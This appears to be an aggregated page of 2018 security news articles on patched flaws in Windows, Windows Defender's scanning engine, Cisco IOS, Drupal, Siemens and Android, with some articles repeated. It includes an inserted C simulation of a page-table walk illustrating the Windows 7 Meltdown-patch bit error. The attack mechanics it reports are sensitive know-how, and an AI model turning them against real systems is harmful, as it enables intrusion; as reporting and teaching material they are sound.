Google also included a Qualcomm closed-source components 2014-2016 cumulative update as part of its April 2018 Android security bulletin, although many devices have already addressed these issues in previous updates.

“These vulnerabilities affect Qualcomm components and were shared by Qualcomm with their partners through Qualcomm AMSS security bulletins or security alerts between 2014 and 2016. They are included in this Android security bulletin in order to associate them with a security patch level,” Google explains.

Over 250 vulnerabilities were included in the cumulative update, most rated High severity. One of the bugs was rated Critical risk and 9 were rated Moderate severity.

This month, Google also addressed over 40 vulnerabilities in the Nexus and Pixel devices, all rated Moderate severity (four of the flaws have a High severity rating on Android 6.0 and 6.0.1 devices). Impacted components include Framework, Media framework, System, and Broadcom, Kernel, and Qualcomm components.

On top of these security fixes, the Internet giant also included over 70 functional updates for Google devices as part of the April 2018 Pixel / Nexus Security Bulletin.


Critical Vulnerability Patched in Microsoft Malware Protection Engine
5.4.2018 securityweek
Vulnerebility

An update released this week by Microsoft for its Malware Protection Engine patches a vulnerability that can be exploited to take control of a system by placing a malicious file in a location where it would be scanned.

The Microsoft Malware Protection Engine provides scanning, detection and cleaning capabilities for security software made by the company. The engine is affected by a flaw that can be exploited for remote code execution when a specially crafted file is scanned.

The malicious file can be delivered via a website, email or instant messenger. The Malware Protection Engine will automatically scan the file (if real-time protection is enabled) and allow the attacker to execute arbitrary code in the context of the LocalSystem account, which can lead to a complete takeover of the targeted system.

On systems where real-time scanning is not enabled, the exploit will still get triggered, but only when a scheduled scan is initiated.

The vulnerability, tracked as CVE-2018-0986 and rated “critical,” affects several Microsoft products that use the Malware Protection Engine, including Exchange Server, Forefront Endpoint Protection 2010, Security Essentials, Windows Defender, and Windows Intune Endpoint Protection.

While the flaw is dangerous and easy to exploit, Microsoft believes exploitation is “less likely.” The company pointed out that the patch for this vulnerability will be automatically delivered to customers within 48 hours of release – users and administrators do not have to take any action.

Google Project Zero researcher Thomas Dullien, aka “Halvar Flake,” has been credited for finding CVE-2018-0986. The details of the vulnerability have yet to be disclosed, but considering that the patch is being delivered automatically to most systems, the information will likely become available soon.

This is not the first time Google Project Zero researchers have discovered critical vulnerabilities in Microsoft’s Malware Protection Engine. While Google may occasionally disclose flaws in Microsoft products before patches become available, in the case of the Malware Protection Engine, Microsoft typically releases patches within a few days or weeks.

A similar flaw in the Malware Protection Engine was also found recently by employees of UK's National Cyber Security Centre (NCSC).


Microsoft issued out-of-band patch to fix CVE-2018-0986 Malware Protection Engine flaw

5.4.2018 securityaffairs Vulnerebility

On April 3, Microsoft released an out-of-band security update to address the CVE-2018-0986 vulnerability affecting the Microsoft Malware Protection Engine (MMPE).
The Microsoft Malware Protection Engine is the core component for malware detection and cleaning in several Microsoft anti-malware products. It is currently used in Windows Defender, Microsoft Security Essentials, Microsoft Endpoint Protection, Windows Intune Endpoint Protection, and Microsoft Forefront Endpoint Protection.

The CVE-2018-0986 flaw could be exploited by attackers to execute malicious code on a Windows system with system privileges and gain full control of the vulnerable machine.

The CVE-2018-0986 vulnerability, rated as ‘critical’, was discovered by Thomas Dullien, white hat hacker at Google Project Zero.

“A remote code execution vulnerability exists when the Microsoft Malware Protection Engine does not properly scan a specially crafted file, leading to memory corruption. An attacker who successfully exploited this vulnerability could execute arbitrary code in the security context of the LocalSystem account and take control of the system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,” reads the security advisory published by Microsoft.

“To exploit this vulnerability, a specially crafted file must be scanned by an affected version of the Microsoft Malware Protection Engine.”

According to the experts, the flaw is quite easy to exploit: an attacker can place the malicious code inside JavaScript files hosted on a website and then trick the victim into visiting it. Another attack scenario sees the hackers send the malicious code as an email attachment to the victim, or via an instant messaging client.

The attack doesn’t need user interaction because the Microsoft Malware Protection Engine automatically scans all incoming files.

Experts pointed out that Windows Defender is enabled by default on Windows 10.

Microsoft has addressed the flaw in MMPE version 1.1.14700.5; the security patch is delivered without any user interaction.


“For affected software, verify that the Microsoft Malware Protection Engine version is 1.1.14700.5 or later. If necessary, install the update. Administrators of enterprise antimalware deployments should ensure that their update management software is configured to automatically approve and distribute engine updates and new malware definitions. Enterprise administrators should also verify that the latest version of the Microsoft Malware Protection Engine and definition updates are being actively downloaded, approved and deployed in their environment.” states Microsoft.

“For end-users, the affected software provides built-in mechanisms for the automatic detection and deployment of this update. For these customers, the update will be applied within 48 hours of its availability. The exact time frame depends on the software used, Internet connection, and infrastructure configuration.”


Microsoft's Meltdown Patch Made Windows 7 PCs More Insecure
1.4.2018 thehackernews
Vulnerebility

The Meltdown CPU vulnerability was bad, and Microsoft somehow made the flaw even worse on Windows 7, allowing any unprivileged, user-level application to read content from and even write data to the operating system's kernel memory.
For those unaware, Spectre and Meltdown were security flaws disclosed by researchers earlier this year in processors from Intel, ARM, and AMD, leaving nearly every PC, server, and mobile phone on the planet vulnerable to data theft.
Shortly after the researchers disclosed the Spectre and Meltdown exploits, software vendors, including Microsoft, started releasing patches for their systems running a vulnerable version of processors.
However, independent Swedish security researcher Ulf Frisk found that Microsoft's Meltdown fixes for Windows 7 PCs—a flaw that could originally allow attackers to read kernel memory at a speed of 120 KBps—are now allowing attackers to read the same kernel memory at gigabit-per-second speeds, making the issue even worse on Windows 7 PCs and Server 2008 R2 boxes.
Frisk is the same researcher who previously discovered a way to steal the password from virtually any Mac laptop in just 30 sec by exploiting flaws in Apple's FileVault disk encryption system, allowing attackers to unlock any Mac system and even decrypt files on its hard drive.
The discovery is the latest issue surrounding Meltdown and Spectre patches that were sometimes found incomplete and sometimes broken, making problems such as spontaneous reboots and other 'unpredictable' system behavior on affected PCs.
According to Frisk, the problem with Microsoft's early Meltdown fixes occurs because a single bit (the one that controls whether kernel memory may be accessed) was accidentally flipped from supervisor-only to any-user in a virtual-to-physical-memory translation structure called the PML4, allowing any user-mode application to access the kernel page tables.
The PML4 is the base of the 4-level in-memory page table hierarchy that Intel's CPU Memory Management Unit (MMU) uses to translate the virtual memory addresses of a process into physical memory addresses in RAM.
The correctly set bit normally ensures the kernel has exclusive access to these tables.
"The User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself," Frisk explains in his blog post.
To prove his claim, Frisk also provided a detailed breakdown and a proof-of-concept exploit. The issue only affects 64-bit versions of Windows 7 and Windows Server 2008 R2; Windows 10 and Windows 8.1 PCs are not affected, and on those systems an attacker would still need physical access to a targeted machine.
Buggy Patch Allows to Read Gigabytes of Data In a Second
Also since the PML4 page table has been located at a fixed memory address in Windows 7, "no fancy exploits" are needed to exploit the Meltdown vulnerability.
"Windows 7 already did the hard work of mapping in the required memory into every running process," Frisk said. "Exploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write!"
Once read/write access has been gained to the page tables, it would be "trivially easy" to gain access to the entire physical memory, "unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization," Frisk said.
All attackers have to do is to write their own Page Table Entries (PTEs) into the page tables in order to access arbitrary physical memory.
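To make the bit flip concrete, here is an added example that is neither Frisk's code nor anything from the article: a C model of the x86-64 four-level page walk over a small constructed "physical memory", with a self-referencing PML4 entry whose User/Supervisor bit can be toggled. The slot index 0x100 and the frame layout are chosen for the demo and are not Windows' values; large pages and NX are not modelled. It shows that when the self-referencing entry is marked User, the virtual address whose four 9-bit indices all equal the self slot resolves to the PML4 page itself from user mode, whereas with Supervisor the same walk is refused at the first level. The same finding is restated in the two SecurityWeek articles further down this page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_SIZE 4096ULL
#define ENTRIES   512
#define NPAGES    8

#define PTE_PRESENT   (1ULL << 0)
#define PTE_RW        (1ULL << 1)
#define PTE_USER      (1ULL << 2)   /* the User/Supervisor bit */
#define PTE_ADDR_MASK 0x000FFFFFFFFFF000ULL

/* Constructed "physical memory": NPAGES frames of 512 eight-byte entries each. */
static uint64_t phys[NPAGES][ENTRIES];

static uint64_t frame_addr(int idx) { return (uint64_t)idx * PAGE_SIZE; }

/* Build a minimal hierarchy: one ordinary user page mapped at 0x400000 through
 * frames 1-4, plus a self-referencing entry in PML4 slot `self` (PML4 is frame 0).
 * `self_user` sets U/S on that entry, reproducing the misconfigured state.
 * Returns the PML4 physical address, i.e. what CR3 would hold. */
static uint64_t build_tables(int self, int self_user) {
    memset(phys, 0, sizeof phys);
    uint64_t user_rw = PTE_PRESENT | PTE_RW | PTE_USER;
    phys[0][0] = frame_addr(1) | user_rw;   /* PML4[0] -> PDPT */
    phys[1][0] = frame_addr(2) | user_rw;   /* PDPT[0] -> PD   */
    phys[2][2] = frame_addr(3) | user_rw;   /* PD[2]   -> PT   (0x400000 >> 21 == 2) */
    phys[3][0] = frame_addr(4) | user_rw;   /* PT[0]   -> data frame 4 */
    phys[0][self] = frame_addr(0) | PTE_PRESENT | PTE_RW | (self_user ? PTE_USER : 0);
    return frame_addr(0);
}

/* Software page walk for 4 KiB pages. A user-mode access succeeds only if
 * U/S is set at every level; one supervisor-only entry stops the walk. */
static int translate(uint64_t cr3, uint64_t vaddr, int user, uint64_t *pa) {
    static const int shifts[4] = {39, 30, 21, 12};
    uint64_t table = cr3;
    for (int level = 0; level < 4; level++) {
        if (table / PAGE_SIZE >= NPAGES) return 0;           /* outside the model */
        uint64_t e = phys[table / PAGE_SIZE][(vaddr >> shifts[level]) & 0x1ff];
        if (!(e & PTE_PRESENT)) return 0;
        if (user && !(e & PTE_USER)) return 0;
        table = e & PTE_ADDR_MASK;
    }
    *pa = table | (vaddr & 0xfff);
    return 1;
}

/* Virtual address whose four 9-bit indices all equal `idx`; through a
 * self-referencing PML4 entry it aliases the PML4 page itself. */
static uint64_t self_ref_vaddr(int idx) {
    uint64_t va = ((uint64_t)idx << 39) | ((uint64_t)idx << 30) |
                  ((uint64_t)idx << 21) | ((uint64_t)idx << 12);
    if (va & (1ULL << 47)) va |= 0xFFFF000000000000ULL;     /* canonical form */
    return va;
}

/* 1 if user mode can reach the PML4 page via the self-reference, else 0. */
static int pml4_exposed_to_user(int self_user) {
    const int self = 0x100;   /* demo slot index, chosen for this example only */
    uint64_t cr3 = build_tables(self, self_user);
    uint64_t pa = 0;
    return translate(cr3, self_ref_vaddr(self), 1, &pa) && pa == cr3;
}

int main(void) {
    printf("self-ref U/S = Supervisor: page tables visible to user mode? %d\n", pml4_exposed_to_user(0));
    printf("self-ref U/S = User:       page tables visible to user mode? %d\n", pml4_exposed_to_user(1));
    return 0;
}
```

The walk accumulates permissions the way the MMU does: the data page at 0x400000 is reachable from user mode because every entry on its path is marked User, and the only thing that distinguishes the safe and unsafe configurations is the single bit on the self-referencing entry.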
Frisk said he has not been able to link the new vulnerability to anything on the public list of Common Vulnerabilities and Exposures. He also invited researchers to test the flaw using an exploit kit he released on GitHub.
UPDATE: Microsoft Releases Emergency Patch
In the wake of the researcher's finding, Microsoft released an emergency patch on Thursday for the vulnerability (CVE-2018-1038) introduced as a Meltdown patch issued by the company earlier this year.
The out-of-band security update for Microsoft Windows 7 and Windows Server 2008 R2 "addresses an elevation of privilege vulnerability in the Windows kernel in the 64-Bit (x64) version of Windows."
According to the Microsoft advisory, the elevation of privilege flaw occurs when the Windows kernel fails to handle objects in memory properly. Successful exploitation of this flaw could allow an attacker to run arbitrary code in kernel mode.
"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," the advisory states.
Only Windows 7 Service Pack 1 (x64) and Windows Server 2008 R2 Service Pack 1 (x64) are impacted; no other Windows OS version is affected.
So all admins and users of Windows 7 and Windows 2008R2 are strongly recommended to update their systems as soon as possible.


Critical Flaw Exposes Many Cisco Devices to Remote Attacks
30.3.2018 securityweek 
Vulnerebility

Cisco has patched more than 30 vulnerabilities in its IOS software, including a critical remote code execution flaw that exposes hundreds of thousands – possibly millions – of devices to remote attacks launched over the Internet.

A total of three vulnerabilities have been rated critical. One of them is CVE-2018-0171, an issue discovered by researchers at Embedi in the Smart Install feature in IOS and IOS XE software.

An unauthenticated attacker can send specially crafted Smart Install messages to an affected device on TCP port 4786 and cause it to enter a denial-of-service (DoS) condition or execute arbitrary code.

Cisco pointed out that Smart Install is enabled by default on switches that have not received a recent update for automatically disabling the feature when it’s not in use.

Embedi has published a blog post detailing CVE-2018-0171 and how it can be exploited. Researchers initially believed the vulnerability could only be exploited by an attacker inside the targeted organization’s network. However, an Internet scan revealed that there are roughly 250,000 vulnerable Cisco devices that have TCP port 4786 open.

Furthermore, Embedi told SecurityWeek that it has identified approximately 8.5 million devices that use this port, but researchers have not been able to determine if the Smart Install technology is present on these systems.

Another IOS vulnerability patched by Cisco and rated critical is CVE-2018-0150, a backdoor that allows an attacker to remotely access a device. This security hole is introduced by the existence of an undocumented account with a default username and password. The credentials provide access to a device with privilege level 15, the highest level of access for Cisco network devices.

The last critical security hole is CVE-2018-0151, which affects the quality of service (QoS) subsystem of IOS and IOS XE software. The flaw can allow a remote, unauthenticated attacker to cause a DoS condition or execute code with elevated privileges by sending malicious packets to a device.

The networking giant has patched a total of 17 high severity flaws in IOS and IOS XE software. The list includes mostly DoS issues, but some of the vulnerabilities can be exploited for remote code execution and privilege escalation.

Cisco also patched over a dozen IOS vulnerabilities rated “medium severity.” A majority of the bugs were discovered by the company itself and there is no evidence that any of them have been exploited for malicious purposes.


Microsoft Fixes Windows Flaw Introduced by Meltdown Patches
30.3.2018 securityweek 
Vulnerebility

Microsoft has released out-of-band updates for Windows 7 and Windows Server 2008 R2 to address a serious privilege escalation vulnerability introduced earlier this year by the Meltdown mitigations.

Researcher Ulf Frisk reported this week that the patches released by Microsoft in January and February for the Meltdown vulnerability created an even bigger security hole that allows an attacker to read from and write to memory at significant speeds.

Frisk disclosed details of the bug since Microsoft’s security updates for March appeared to have addressed the issue. However, an investigation conducted by the tech giant revealed that the flaw had not been properly fixed.

Microsoft informed customers on Thursday that a new patch has been released for Windows 7 x64 Service Pack 1 and Windows Server 2008 R2 x64 Service Pack 1 to fully resolve the problem. “Customers who apply the updates, or have automatic updates enabled, are protected,” a Microsoft spokesperson said.

The vulnerability, tracked as CVE-2018-1038 and rated “important,” has been patched with the KB4100480 update. Users are advised to install the update as soon as possible, particularly since some Microsoft employees believe it will likely be exploited in the wild soon.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,” Microsoft said in an advisory.

Frisk explained in a blog post that while the Meltdown vulnerability allows an attacker to read megabytes of data per second, the new flaw can be exploited to read gigabytes of data per second. In one of the tests he conducted, the researcher managed to access the memory at speeds of over 4 Gbps. The security hole can also be exploited to write to memory.

Exploiting the flaw is easy once the attacker has gained access to the targeted system. A direct memory access (DMA) attack tool developed by Frisk can be used to reproduce the vulnerability.


CISCO addresses two critical remote code execution flaws in IOS XE operating system
30.3.2018 securityaffairs
Vulnerebility

This week Cisco patched three critical vulnerabilities affecting its IOS XE operating system; two of them are remote code execution flaws that could be exploited by an attacker to gain full control over vulnerable systems.
Cisco March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication addressed 22 vulnerabilities, 3 of them rated as critical and 19 as high.

Let’s give a close look at the critical vulnerabilities.

The first issue, tracked as CVE-2018-0151, is an IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability.

“A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.” reads the advisory published by Cisco.

“The vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device”


The second vulnerability, tracked as CVE-2018-0171, affects the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software; it could be exploited by an unauthenticated, remote attacker to cause a reload of a vulnerable device or to execute arbitrary code on it.

“The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786.” reads the security advisory published by Cisco.

“A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts:

Triggering a reload of the device
Allowing the attacker to execute arbitrary code on the device
Causing an indefinite loop on the affected device that triggers a watchdog crash”
The third flaw, affecting Cisco IOS XE Software, is due to an undocumented user account “with privilege level 15” that has a default username and password.

The issue tracked as CVE-2018-0150 could be exploited by an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default credentials.

“A vulnerability in Cisco IOS XE Software could allow an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default username and password that are used at initial boot.” reads the security advisory published by Cisco.

“The vulnerability is due to an undocumented user account with privilege level 15 that has a default username and password. An attacker could exploit this vulnerability by using this account to remotely connect to an affected device. A successful exploit could allow the attacker to log in to the device with privilege level 15 access.”


Drupal finally addressed the critical CVE-2018-7600 Drupalgeddon2 vulnerability
30.3.2018 securityaffairs
Vulnerebility

The Drupal development team has fixed the drupalgeddon2 vulnerability that could be exploited by an attacker to take over a website.
A few days ago, Drupal Security Team confirmed that a “highly critical” vulnerability, tracked as CVE-2018-7600, affects Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by Drupal developer Jasper Mattsson.

Neither Drupal 8.3.x nor 8.4.x is still supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates for those branches as well.

Now the Drupal development team has fixed the vulnerability, which could be exploited by an attacker to run arbitrary code in the CMS core and take over a website just by accessing a URL.

The Drupal CMS currently runs on over one million websites; it is the second most popular content management system behind WordPress.

Website administrators should immediately upgrade their sites to Drupal 7.58 or Drupal 8.5.1.

The flaw was dubbed Drupalgeddon2 after the CVE-2014-3704 Drupalgeddon security vulnerability that was discovered in 2014 that was exploited in numerous successful attacks in the wild.

The good news is that, at this time, there is no public proof-of-concept code available online.

The Drupal security team declared that it was not aware of any attacks exploiting the Drupalgeddon2 vulnerability in the wild.
“A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.” reads the security advisory published by Drupal.

“The security team has written an FAQ about this issue. Solution:

Upgrade to the most recent version of Drupal 7 or 8 core.

If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)”
Patching websites is essential; the popular expert Kevin Beaumont noticed that the Drupal homepage itself was taken down for half an hour to address Drupalgeddon2.

Kevin Beaumont, Actual Porg 👻 (@GossiTheDog), 9:52 PM - Mar 28, 2018 · Manchester, England:

The Drupal team took the site offline before the announcement to do a version upgrade, and now the site doesn’t work 😃💃🏽
The Drupal team also issued security patches for the 6.x versions that were discontinued in February 2016.

“This issue also affects Drupal 6. Drupal 6 is End of Life. For more information on Drupal 6 support please contact a D6LTS vendor.” continues the advisory.


Microsoft Patches for Meltdown Introduced Severe Flaw: Researcher
30.3.2018 securityweek
Vulnerebility

Some of the Windows updates released by Microsoft to mitigate the Meltdown vulnerability introduce an even more severe security hole, a researcher has warned.

Microsoft has released patches for the Meltdown and Spectre vulnerabilities every month since their disclosure in January. While at this point the updates should prevent these attacks, a researcher claims some of the fixes create a bigger problem.

According to Ulf Frisk, the updates released by Microsoft in January and February for Windows 7 and Windows Server 2008 R2 patch Meltdown, but they allow an attacker to easily read from and write to memory.

He noted that while Meltdown allows an attacker to read megabytes of data per second, the new vulnerability can be exploited to read gigabytes of data per second – in one of the tests he conducted, the expert managed to access the memory at speeds of over 4 Gbps. Moreover, the flaw also makes it possible to write to memory.

Frisk says exploitation does not require any sophisticated exploits – standard read and write instructions will get the job done – as Windows 7 has already mapped the memory for each active process.

“In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself,” the researcher explained. “The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM.”

“Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory,” he said.

The researcher says anyone can reproduce the vulnerability using a direct memory access (DMA) attack tool he developed a few years ago. The attack works against devices running Windows 7 x64 or Windows Server 2008 R2 with the Microsoft patches from January or February installed. The issue did not exist before January and it appears to have been addressed by Microsoft with the March updates. Windows 10 and Windows 8.1 are not affected, Frisk said.

A Microsoft spokesperson told SecurityWeek that the company is aware of the report and is looking into it.

Frisk previously discovered a macOS vulnerability that could have been exploited to obtain FileVault passwords, and demonstrated some UEFI attacks.


Drupalgeddon: Highly Critical Flaw Exposes Million Drupal Websites to Attacks
30.3.2018 securityweek
Vulnerebility

All versions of the Drupal content management system are affected by a highly critical vulnerability that can be easily exploited to take complete control of affected websites in what may turn out to be Drupalgeddon 2.0.

While analyzing the security of Drupal, Jasper Mattsson discovered a serious remote code execution flaw that impacts versions 6, 7 and 8. This represents more than one million websites that can be hacked by a remote and unauthenticated attacker.

The security hole, tracked as CVE-2018-7600 and assigned a risk score of 21/25, can be exploited simply by accessing a page on the targeted Drupal website. Once exploited, it gives the attacker full control over a site, including access to non-public data and the possibility to delete or modify system data, Drupal developers warned.

The vulnerability has been patched with the release of Drupal 7.58, 8.5.1, 8.3.9 and 8.4.6. While Drupal 6 has reached end of life and has not been supported since February 2016, a fix has still been developed due to the severity of the flaw and the high risk of exploitation.

Besides updating their installations to the latest version, users can protect their websites against attacks by making some changes to the site’s configuration. However, the required changes are “drastic.”

“There are several solutions, but they are all based on the idea of not serving the vulnerable Drupal pages to visitors. Temporarily replacing your Drupal site with a static HTML page is an effective mitigation. For staging or development sites you could disable the site or turn on a ‘Basic Auth’ password to prevent access to the site,” Drupal developers said.

Cloudflare also announced that it has pushed out a rule to its Web Application Firewall (WAF) to block potential attacks.

While no technical details have been made public, Drupal believes that exploits targeting the vulnerability will be created within hours or days, which is why it alerted users of the flaw and an upcoming patch one week in advance. This appears to have been a good strategy, but many websites may still remain vulnerable for extended periods of time.


In the case of the notorious Drupalgeddon vulnerability, hackers had used it to take control of websites nearly two years after a patch was released.

While there haven’t been many reports of Drupal flaws being exploited in the wild since Drupalgeddon, one of the vulnerabilities patched in June 2017 by the developers of the CMS had been leveraged in some spam campaigns.


Microsoft Patches for Meltdown Introduced Severe Flaw: Researcher
28.3.2018 securityweek
Vulnerebility

Some of the Windows updates released by Microsoft to mitigate the Meltdown vulnerability introduce an even more severe security hole, a researcher has warned.

Microsoft has released patches for the Meltdown and Spectre vulnerabilities every month since their disclosure in January. While at this point the updates should prevent these attacks, a researcher claims some of the fixes create a bigger problem.

According to Ulf Frisk, the updates released by Microsoft in January and February for Windows 7 and Windows Server 2008 R2 patch Meltdown, but they allow an attacker to easily read from and write to memory.

He noted that while Meltdown allows an attacker to read megabytes of data per second, the new vulnerability can be exploited to read gigabytes of data per second – in one of the tests he conducted, the expert managed to access the memory at speeds of over 4 Gbps. Moreover, the flaw also makes it possible to write to memory.

Frisk says exploitation does not require any sophisticated exploits – standard read and write instructions will get the job done – as Windows 7 has already mapped the memory for each active process.

“In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself,” the researcher explained. “The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM.”

“Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory,” he said.

The researcher says anyone can reproduce the vulnerability using a direct memory access (DMA) attack tool he developed a few years ago. The attack works against devices running Windows 7 x64 or Windows Server 2008 R2 with the Microsoft patches from January or February installed. The issue did not exist before January and it appears to have been addressed by Microsoft with the March updates. Windows 10 and Windows 8.1 are not affected, Frisk said.

SecurityWeek has reached out to Microsoft for comment and will update this article if the company responds.

Frisk previously discovered a macOS vulnerability that could have been exploited to obtain FileVault passwords, and demonstrated some UEFI attacks.


Critical Flaws Found in Siemens Telecontrol, Building Automation Products
28.3.2018 securityweek
Vulnerebility

Siemens informed customers this week that critical vulnerabilities have been found in some of its telecontrol and building automation products, and revealed that some SIMATIC systems are affected by a high severity flaw.

One advisory published by the company describes several critical and high severity flaws affecting Siveillance and Desigo building automation products. The security holes exist due to the use of a vulnerable version of a Gemalto license management system (LMS).

The bugs affect Gemalto Sentinel LDK and they can be exploited for remote code execution and denial-of-service (DoS) attacks.

The vulnerabilities were discovered by researchers at Kaspersky Lab and disclosed in January. The security firm warned at the time that millions of industrial and corporate systems may be exposed to remote attacks due to their use of the vulnerable Gemalto product.

Siemens warned at the time that more than a dozen versions of the SIMATIC WinCC Add-On were affected. The company has now informed customers that some of its building automation products are impacted as well, including Siveillance Identity and SiteIQ Analytics, and Desigo XWP, CC, ABT, Configuration Manager, and Annual Shading.

The German industrial giant has advised customers to update the LMS to version 2.1 SP4 (2.1.681) or newer in order to address the vulnerabilities.

A separate advisory published by Siemens this week informs customers of a critical vulnerability affecting TIM 1531 IRC, a communication module launched by the company nearly a year ago. The module connects remote stations based on SIMATIC controllers to a telecontrol control center through the Sinaut ST7 protocol.

“A remote attacker with network access to port 80/tcp or port 443/tcp could perform administrative operations on the device without prior authentication. Successful exploitation could allow to cause a denial-of-service, or read and manipulate data as well as configuration settings of the affected device,” Siemens explained.

The company said there had been no evidence of exploitation when it published its advisory on Tuesday.

A third advisory published by Siemens this week describes a high severity flaw discovered by external researchers in SIMATIC PCS 7, SIMATIC WinCC, SIMATIC WinCC Runtime Professional, and SIMATIC NET PC products.

The vulnerability allows an attacker to cause a DoS condition on the impacted products by sending specially crafted messages to their RPC service. Patches or mitigations have been made available by Siemens for each of the affected systems.


The Top Vulnerabilities Exploited by Cybercriminals
27.3.2018 securityweek
Vulnerebility

Cybercriminals are shifting their focus from Adobe to Microsoft consumer products, and are now concentrating more on targeted attacks than on web-based exploit kits.

Each year, Recorded Future provides an analysis of criminal chatter on the dark web in its Top Ten Vulnerabilities Report. It does this because it perceives a weakness in traditional vulnerability databases and scanning tools -- they do not indicate which vulnerabilities are currently being exploited, nor to what extent. Reliance on vulnerability lists alone cannot say where patching and remediation efforts should be prioritized.

"We do this analysis because the sale and use of exploits is a for-profit industry," Recorded Future's VP of technical solutions, Scott Donnelly, told SecurityWeek. This means that exploit developers have to sell their products, while other criminals have to buy them -- and this leads to the chatter that Recorded Future analyzes.

"If you're a cybercriminal trying to make money, you have to discuss it. If you hold back too much you're not going to make any money; so, there's a necessity for the criminals to stick their heads up a little bit -- and we can take advantage of that and call out some of the big conversations." It assumes a correlation between chatter about a vulnerability with active exploitation of that vulnerability -- an assumption that common sense rather than science suggests is reasonable.

Donnelly is confident that his firm's knowledge of and access to the dark web is statistically valid. Nation-state activity is specifically excluded from this analysis, because, he says, "If you're a nation-state with an exploit, or if you're a third-party supplier of exploits to a nation state, you're less likely to talk about it in a general criminal forum."

At the macro level, this year's analysis highlights a move away from Adobe vulnerabilities towards Microsoft consumer product vulnerabilities. While Flash exploits have dominated earlier annual reports, seven of the top ten (including the top five) most discussed vulnerabilities are now Microsoft vulnerabilities. "As Adobe Flash Player has begun to see its usage significantly drop, this year we find that it's a lot of Microsoft consumer products that are seeing heavy exploitation," says Donnelly.

The three most used vulnerabilities are CVE-2017-0199 (which allows attackers to download and execute a Visual Basic script containing PowerShell commands from a malicious document), CVE-2016-0189 (which is an old Internet Explorer vulnerability that allows attackers to use an exploit kit to drop malware, such as ransomware), and CVE-2017-0022 (which enables data theft).

A second major takeaway from the analysis is that 2017 has seen a significant drop in the development of new exploit kits. "This has been noticed before," Donnelly told SecurityWeek, "but mainly because researchers simply haven't seen them in action. This is now evidence that the criminals themselves aren't talking about or trying to sell that many new kits."

In raw numbers, Recorded Future's analysis noted 26 new kits in 2016, but only 10 new kits in 2017 (from a total list of 158 EKs). "The observed drop in exploit kit activity," suggests Donnelly, "overlaps with the rapid decline of Flash Player usage. Users have shifted to more secure browsers, and attackers have shifted as well. Spikes in cryptocurrency mining malware and more targeted victim attacks have filled the void."

At the micro level, the big takeaway from this report is the anomalous position of CVE-2017-0022. It is the third most discussed vulnerability on the dark web forums, yet in relation to just two pieces of malware: the exploit kits Astrum (aka Stegano) and Neutrino. This is the lowest number of associated malware in the top ten vulnerabilities -- both of the two more popular vulnerabilities are associated with ten different pieces of malware. CVE-2017-0199 is associated with malware including Hancitor, Dridex and FinFisher, while CVE-2016-0189 is associated with nine different exploit kits and the Magniber ransomware.

But it's not just in malware associations that CVE-2017-0022 is anomalous. It has a Common Vulnerability Scoring System (CVSS) rating of just 4.3. The next lowest rating in the top ten vulnerabilities is 7.6, while the top two are rated at 9.3 and 7.6. CVSS defines a 4.3 score as medium risk; and yet Recorded Future's research shows it to be the third most exploited vulnerability, commenting, "'In the wild' severity does not always correlate with the Common Vulnerability Scoring System (CVSS) score."

This is a prime example of the reason for the analysis. Security teams could check the CVSS score and conclude on this evidence alone that the vulnerability does not require expedited remediation or patching. As the third most exploited vulnerability, Recorded Future's latest threat analysis suggests otherwise.

Boston, Mass.-based Recorded Future raised $25 million in a Series E funding round led by Insight Venture Partners in October 2017 -- bringing the total funding raised to $57.9 million.


New "ThreadKit" Office Exploit Builder Emerges
27.3.2018 securityweek
Vulnerebility

A newly discovered Microsoft Office document exploit builder kit has been used for the distribution of a variety of malicious payloads, including banking Trojans and backdoors, Proofpoint reports.

